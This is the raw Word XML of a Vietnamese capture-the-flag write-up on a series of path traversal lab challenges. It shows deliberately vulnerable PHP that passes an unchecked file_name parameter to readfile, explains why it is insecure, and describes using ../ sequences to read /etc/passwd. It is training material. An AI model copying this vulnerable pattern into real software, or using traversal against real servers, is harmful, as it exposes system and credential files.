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2027" w14:textId="77777777" w:rsidR="009E7598" w:rsidRPr="009E7598" w:rsidRDefault="009E7598" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="009E7598">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Chuỗi các thử thách về lỗi bảo mật liên quan đến Path Traversal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A727D76" w14:textId="77777777" w:rsidR="009E7598" w:rsidRPr="009E7598" w:rsidRDefault="009E7598" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="009E7598">
        <w:t>Nhiệm vụ:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15441D78" w14:textId="77777777" w:rsidR="009E7598" w:rsidRPr="009E7598" w:rsidRDefault="009E7598" w:rsidP="004F0B2A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="009E7598">
        <w:t>Ở level 1 và 2, nhiệm vụ của bạn là đọc nội dung file </w:t>
      </w:r>
      <w:r w:rsidRPr="009E7598">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712B32F9" w14:textId="77777777" w:rsidR="009E7598" w:rsidRPr="009E7598" w:rsidRDefault="009E7598" w:rsidP="004F0B2A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="009E7598">
        <w:t>Các level 3,4,5,6 mục tiêu của bạn là chiếm quyền điều khiển server và đọc một tập tin bí mật ở thư mục gốc (đường dẫn /) để chứng minh bạn đã khai thác thành công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214F6502" w14:textId="77777777" w:rsidR="009E7598" w:rsidRPr="009E7598" w:rsidRDefault="009E7598" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="009E7598">
        <w:t>Link các thử thách:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE2BC97" w14:textId="77777777" w:rsidR="009E7598" w:rsidRPr="009E7598" w:rsidRDefault="009E7598" w:rsidP="004F0B2A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="009E7598">
        <w:t>Level 1: </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="009E7598">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://pathtraversal.cyberjutsu-lab.tech:8091</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7E69D5E7" w14:textId="77777777" w:rsidR="009E7598" w:rsidRPr="009E7598" w:rsidRDefault="009E7598" w:rsidP="004F0B2A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="009E7598">
        <w:t>Level 2: </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="009E7598">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://pathtraversal.cyberjutsu-lab.tech:8092</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3D3FF23C" w14:textId="77777777" w:rsidR="009E7598" w:rsidRPr="009E7598" w:rsidRDefault="009E7598" w:rsidP="004F0B2A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="009E7598">
        <w:t>Level 3: </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="009E7598">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://pathtraversal.cyberjutsu-lab.tech:8093</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="593CB040" w14:textId="77777777" w:rsidR="009E7598" w:rsidRPr="009E7598" w:rsidRDefault="009E7598" w:rsidP="004F0B2A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="009E7598">
        <w:t>Level 4: </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="009E7598">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://pathtraversal.cyberjutsu-lab.tech:8094</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="084279E5" w14:textId="77777777" w:rsidR="009E7598" w:rsidRPr="009E7598" w:rsidRDefault="009E7598" w:rsidP="004F0B2A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="009E7598">
        <w:t>Level 5: </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="009E7598">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://pathtraversal.cyberjutsu-lab.tech:8095</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="794AF638" w14:textId="77777777" w:rsidR="009E7598" w:rsidRPr="009E7598" w:rsidRDefault="009E7598" w:rsidP="004F0B2A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="009E7598">
        <w:t>Level 6: </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="009E7598">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://pathtraversal.cyberjutsu-lab.tech:8096</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4BD4ACBE" w14:textId="77777777" w:rsidR="009E7598" w:rsidRPr="009E7598" w:rsidRDefault="009E7598" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="009E7598">
        <w:t>Sau khi hoàn thành thử thách, hãy gửi Flag cho tụi mình tại -&gt; </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="009E7598">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://wpt.cyberjutsu.io/challenges</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="117A13E0" w14:textId="0296237D" w:rsidR="009E7598" w:rsidRDefault="009E7598" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C40790" w14:textId="77777777" w:rsidR="00C45D5E" w:rsidRPr="00FF23DE" w:rsidRDefault="00C45D5E" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF23DE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Level</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF23DE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF23DE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15375BC2" w14:textId="22DD895A" w:rsidR="00C45D5E" w:rsidRDefault="00C45D5E" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Thông</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tin source code xử lý chính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7569DC" w:rsidRPr="007569DC" w14:paraId="4EF1A3B0" w14:textId="77777777" w:rsidTr="007569DC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="134690E9" w14:textId="77777777" w:rsidR="007569DC" w:rsidRPr="007569DC" w:rsidRDefault="007569DC" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="007569DC">
              <w:t>1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1531FCBC" w14:textId="77777777" w:rsidR="007569DC" w:rsidRPr="007569DC" w:rsidRDefault="007569DC" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="007569DC">
              <w:t xml:space="preserve"> 2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39B973B7" w14:textId="77777777" w:rsidR="007569DC" w:rsidRPr="007569DC" w:rsidRDefault="007569DC" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="007569DC">
              <w:t xml:space="preserve"> 3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A990EE5" w14:textId="77777777" w:rsidR="007569DC" w:rsidRPr="007569DC" w:rsidRDefault="007569DC" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="007569DC">
              <w:t xml:space="preserve"> 4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CDD31BE" w14:textId="77777777" w:rsidR="007569DC" w:rsidRPr="007569DC" w:rsidRDefault="007569DC" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="007569DC">
              <w:t xml:space="preserve"> 5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CCA3BF6" w14:textId="77777777" w:rsidR="007569DC" w:rsidRPr="007569DC" w:rsidRDefault="007569DC" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="007569DC">
              <w:t xml:space="preserve"> 6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="056B229D" w14:textId="77777777" w:rsidR="007569DC" w:rsidRPr="007569DC" w:rsidRDefault="007569DC" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="007569DC">
              <w:t xml:space="preserve"> 7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A1B9721" w14:textId="77777777" w:rsidR="007569DC" w:rsidRPr="007569DC" w:rsidRDefault="007569DC" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="007569DC">
              <w:t xml:space="preserve"> 8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F81D2BD" w14:textId="77777777" w:rsidR="007569DC" w:rsidRPr="007569DC" w:rsidRDefault="007569DC" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="007569DC">
              <w:t xml:space="preserve"> 9</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="027E58FB" w14:textId="77777777" w:rsidR="007569DC" w:rsidRPr="007569DC" w:rsidRDefault="007569DC" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="007569DC">
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8707" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44285120" w14:textId="77777777" w:rsidR="007569DC" w:rsidRPr="007569DC" w:rsidRDefault="007569DC" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="007569DC">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>&lt;?php</w:t>
            </w:r>
            <w:r w:rsidRPr="007569DC">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59BD1E74" w14:textId="77777777" w:rsidR="007569DC" w:rsidRPr="007569DC" w:rsidRDefault="007569DC" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="007569DC">
              <w:t>$file_name = $_GET[</w:t>
            </w:r>
            <w:r w:rsidRPr="007569DC">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>'file_name'</w:t>
            </w:r>
            <w:r w:rsidRPr="007569DC">
              <w:t>];</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47463337" w14:textId="77777777" w:rsidR="007569DC" w:rsidRPr="007569DC" w:rsidRDefault="007569DC" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="007569DC">
              <w:t xml:space="preserve">$file_path = </w:t>
            </w:r>
            <w:r w:rsidRPr="007569DC">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>'/var/www/html/images/'</w:t>
            </w:r>
            <w:r w:rsidRPr="007569DC">
              <w:t xml:space="preserve"> . $file_name; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B278E1C" w14:textId="77777777" w:rsidR="007569DC" w:rsidRPr="007569DC" w:rsidRDefault="007569DC" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="007569DC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="007569DC">
              <w:t xml:space="preserve"> (file_exists($file_path)) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6783ACCC" w14:textId="77777777" w:rsidR="007569DC" w:rsidRPr="007569DC" w:rsidRDefault="007569DC" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="007569DC">
              <w:t xml:space="preserve">    header(</w:t>
            </w:r>
            <w:r w:rsidRPr="007569DC">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>'Content-Type: image/png'</w:t>
            </w:r>
            <w:r w:rsidRPr="007569DC">
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41890C37" w14:textId="77777777" w:rsidR="007569DC" w:rsidRPr="007569DC" w:rsidRDefault="007569DC" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="007569DC">
              <w:t xml:space="preserve">    readfile($file_path);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41A6685B" w14:textId="77777777" w:rsidR="007569DC" w:rsidRPr="007569DC" w:rsidRDefault="007569DC" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="007569DC">
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27FE44C0" w14:textId="77777777" w:rsidR="007569DC" w:rsidRPr="007569DC" w:rsidRDefault="007569DC" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="007569DC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>else</w:t>
            </w:r>
            <w:r w:rsidRPr="007569DC">
              <w:t xml:space="preserve"> { </w:t>
            </w:r>
            <w:r w:rsidRPr="007569DC">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>// Image file not found</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60A03D7C" w14:textId="77777777" w:rsidR="007569DC" w:rsidRPr="007569DC" w:rsidRDefault="007569DC" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="007569DC">
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="007569DC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>echo</w:t>
            </w:r>
            <w:r w:rsidRPr="007569DC">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="007569DC">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>" 404 Not Found"</w:t>
            </w:r>
            <w:r w:rsidRPr="007569DC">
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E639FAD" w14:textId="77777777" w:rsidR="007569DC" w:rsidRPr="007569DC" w:rsidRDefault="007569DC" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="007569DC">
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="41934DAB" w14:textId="6DCB4F5C" w:rsidR="003953E4" w:rsidRDefault="003953E4" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="003953E4">
        <w:t>Đoạn code này tạo ra một $file_path bằng cách nối chuỗi '/var/www/html/images/' với giá trị param file_name, sau đó kiểm tra xem có tồn tại file này không. Nếu có, đọc file đó với hàm readfile(). Ngược lại, in ra "404 Not Found"</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6138C908" w14:textId="77777777" w:rsidR="00C62C73" w:rsidRPr="00C62C73" w:rsidRDefault="00C62C73" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00C62C73">
        <w:t>Vấn đề bảo mật</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFF2621" w14:textId="786C7E27" w:rsidR="00C62C73" w:rsidRPr="00C62C73" w:rsidRDefault="00C62C73" w:rsidP="004F0B2A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00C62C73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Không kiểm tra đầu vào file_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A853410" w14:textId="75309693" w:rsidR="00C62C73" w:rsidRPr="00C62C73" w:rsidRDefault="00C62C73" w:rsidP="004F0B2A">
      <w:pPr>
        <w:ind w:left="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00C62C73">
        <w:t>→ Người dùng có thể truyền giá trị tùy ý, bao gồm chuỗi ../ để truy cập ra ngoài thư mục images.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E09A8A6" w14:textId="77777777" w:rsidR="00B22111" w:rsidRPr="00B22111" w:rsidRDefault="00C62C73" w:rsidP="004F0B2A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00B22111">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ghép nối đường dẫn trực tiếp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432B22D4" w14:textId="0B232330" w:rsidR="00C62C73" w:rsidRPr="00C62C73" w:rsidRDefault="00C62C73" w:rsidP="004F0B2A">
      <w:pPr>
        <w:ind w:left="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00C62C73">
        <w:t xml:space="preserve">→ Không sử dụng realpath() để chuẩn hóa đường dẫn, dẫn đến nguy cơ </w:t>
      </w:r>
      <w:r w:rsidRPr="00B22111">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Path Traversal</w:t>
      </w:r>
      <w:r w:rsidRPr="00C62C73">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056B64DB" w14:textId="77777777" w:rsidR="00B22111" w:rsidRPr="00B22111" w:rsidRDefault="00C62C73" w:rsidP="004F0B2A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00B22111">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Không giới hạn phần mở rộng hoặc MIME</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E3F0C3" w14:textId="6756A130" w:rsidR="00C62C73" w:rsidRPr="00C62C73" w:rsidRDefault="00C62C73" w:rsidP="004F0B2A">
      <w:pPr>
        <w:ind w:left="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00C62C73">
        <w:t>→ Dù header là image/png, nhưng nếu file là văn bản (ví dụ /etc/passwd), nội dung vẫn được hiển thị — gây rò rỉ thông tin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605D88A6" w14:textId="77777777" w:rsidR="00B22111" w:rsidRPr="00B22111" w:rsidRDefault="00C62C73" w:rsidP="004F0B2A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00B22111">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Không kiểm tra quyền truy cập hoặc thư mục hợp lệ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29513E6A" w14:textId="6EFA4A41" w:rsidR="003953E4" w:rsidRPr="003953E4" w:rsidRDefault="00C62C73" w:rsidP="0017615F">
      <w:pPr>
        <w:ind w:left="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00C62C73">
        <w:t>→ File bất kỳ trên hệ thống có thể bị truy xuất nếu biết tên và đường dẫn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CACA091" w14:textId="7080A0BF" w:rsidR="00C45D5E" w:rsidRPr="00CF619D" w:rsidRDefault="00C45D5E" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF619D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">* Ý tưởng </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE2CAC2" w14:textId="15AE6CD4" w:rsidR="005D1A6C" w:rsidRDefault="005D1A6C" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="005D1A6C">
        <w:t>Ứng dụng nhận tham số file_name từ URL và nối trực tiếp vào đường dẫn /var/www/html/images/ để truy xuất file. Tuy nhiên, không có bất kỳ kiểm tra nào đối với giá trị đầu vào, dẫn đến khả năng Path Traversal.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Để thực hiện khai thác </w:t>
      </w:r>
      <w:r w:rsidRPr="005D1A6C">
        <w:t xml:space="preserve">có thể sử dụng chuỗi ../ để truy cập ra ngoài thư mục </w:t>
      </w:r>
      <w:r>
        <w:t>images.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C7B7C3" w14:textId="77777777" w:rsidR="005D1A6C" w:rsidRPr="00184ED1" w:rsidRDefault="005D1A6C" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00184ED1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>* Khai thác</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7C96B0" w14:textId="274258DE" w:rsidR="007569DC" w:rsidRPr="00DC28A3" w:rsidRDefault="00DC28A3" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Hlk215521919"/>
      <w:r w:rsidRPr="00DC28A3">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Sau khi truy cập vào website, trang web hiển thị một giao diện có tiêu đề "Free Icon" cùng danh sách các hình ảnh minh họa như cờ, bom, pizza, sandwich,... Mỗi hình ảnh được trình bày dưới dạng một thẻ (card) có nút "View" bên </w:t>
      </w:r>
      <w:r>
        <w:t>dưới:</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:p w14:paraId="5AACE138" w14:textId="4E22C7F0" w:rsidR="008438A8" w:rsidRDefault="008B6964" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="008B6964">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="275D29D1" wp14:editId="453D9159">
            <wp:extent cx="5731510" cy="2783840"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1469183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83705" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2783840"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="597377A0" w14:textId="75F5108C" w:rsidR="008B6964" w:rsidRDefault="00966CCF" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00966CCF">
        <w:t>Khi người dùng nhấn vào nút "View", hệ thống sẽ gửi yêu cầu tới server để tải và hiển thị hình ảnh tương ứng</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> bằng cách</w:t>
      </w:r>
      <w:r w:rsidRPr="00966CCF">
        <w:t xml:space="preserve"> xử lý tên file ảnh thông qua tham số truyền trên </w:t>
      </w:r>
      <w:r>
        <w:t>URL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357E67D7" w14:textId="01D77FEA" w:rsidR="008B6964" w:rsidRDefault="008B6964" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="008B6964">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4352DC2B" wp14:editId="08115251">
            <wp:extent cx="5731510" cy="2006600"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="84022626" name="Picture 1" descr="A black and white image of a bom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2626" name="Picture 1" descr="A black and white image of a bomb&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
